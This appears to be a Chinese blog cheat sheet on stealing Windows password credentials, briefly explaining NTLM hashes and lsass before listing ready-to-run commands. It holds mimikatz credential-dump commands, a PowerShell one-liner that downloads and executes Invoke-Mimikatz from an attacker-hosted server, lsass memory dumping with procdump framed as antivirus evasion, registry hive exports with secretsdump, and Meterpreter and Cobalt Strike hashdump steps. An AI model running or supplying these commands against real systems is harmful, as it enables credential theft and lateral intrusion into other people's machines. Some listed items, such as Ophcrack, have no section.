windows 密码凭证获取

  1. Mimikatz
  2. Powershell脚本
  3. WCE
  4. Pwddump7
  5. Ophcrack
  6. Procdump+Mimikatz
  7. 注册表导出Hash
  8. LaZagne
  9. Meterpreter获取Hash
  10. Cobaltstrile获取Hash

Windows系统下hash密码格式:
用户名称:RID:LM-HASH值:NT-HASH值

记住后半段的NTLM
在这里插入图片描述

windows本地认证流程:

  1. 用户输入密码
  2. 系统收到密码后将用户输入的密码计算成NTLM Hash
  3. 与sam数据库(%SystemRoot%\system32\config\sam)中该用户的哈希比对
    -sam sam.hiv -security security.hiv -system system.hiv
  4. 匹配则登陆成功,不匹配则登陆失败
    NTLM哈希,是一种单向哈希算法,Windows将用户的密码计算成NTLM哈希之后才存储在电脑中。
    本地认证中用来处理用户输入密码的进程为lsass.exe,密码会在这个进程中明文保存,供该进程将密码计算成
    NTLM Hash与sam进行比对,我们使用mimikatz来获取的明文密码,便是在这个进程中读取到的

1
mimikatz For Win10下载:

https://github.com/gentilkiwi/mimikatz/releases
本地非交互式凭证获取:
管理员权限运行CMD
mimikatz.exe “log res.txt” “privilege::debug” “token::elevate” “lsadump::sam” “exit”
mimikatz.exe “log logon.txt” “privilege::debug” “sekurlsa::logonpasswords” “exit”

2
在kali上启动一个服务
python3 -m http.server
python2 -m simplehttp.server
以管理员运行
Powershell远程加载mimikatz脚本:
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.231.134:8000/Invoke-Mimikatz.ps1’);Invoke-Mimikatz –DumpCreds

以管理员运行
Powershell加载Get-PassHashes脚本:
powershell IEX(new-object net.webclient).downloadstring(‘http://192.168.231.134:8000/Get-PassHashes.ps1’);Get-PassHashes

3wce
WCE:Windows Credentials Editor
WCE是跟mimikztz齐名的一款hash管理工具。
官网地址:https://www.ampliasecurity.com/research.html
32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
历史版本下载:https://www.ampliasecurity.com/research/windows-credentials-editor/

4
这款工具可以读取出当前系统的各个用户的密码hash (包括LM和NTLM)。
在命令行输入Pwddump7.txt就可以读取出hash并显示出来,也可以保存到一个文件中。
Pwddump7.exe > pass.txt

6
Procdump+Mimikatz 官方工具免杀
Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
Procdump lsass 进程导出:
For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp
For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
然后使用mimikatz还原密码:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

7注册表导出hash
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv
导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。
mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

8laZagne
项目地址:
https://github.com/AlessandroZ/LaZagne
python laZagne.py windows 还有获取git\svn等账号密码的功能

9meterpreter获取hash
• Hashdump
use post/windows/gather/hashdump //system权限的meterpreter
set session 1
exploit //结果保存在tmp目录下
use post/windows/gather/smart_hashdump
set session 1
exploit
windows 密码凭证获取_第1张图片

getuid
hashdump
load mimikatz
msv
kerberos

• Mimikatz
Hashdump使用的是mimikatz的部分功能
Load mimikatz
获取用户密码的hash值
wdigest 、kerberos 、msv 、ssp 、tspkg 、livessp
mimikatz_command -h
mimikatz_command -f :: //查询有哪些模块
mimikatz_command -f samdump::hashes //从windows的sam文件中读取密码hash值
mimikatz_command -f sekurlsa::searchPasswords //获取明文密码
mimikatz_command -f samdump::bootkey

10cobaltstrike获取hash–管理员权限
hashdump
logonpasswords
mimikatz sekurlsa::logonpasswords

你可能感兴趣的:(初学者常见问题,windows)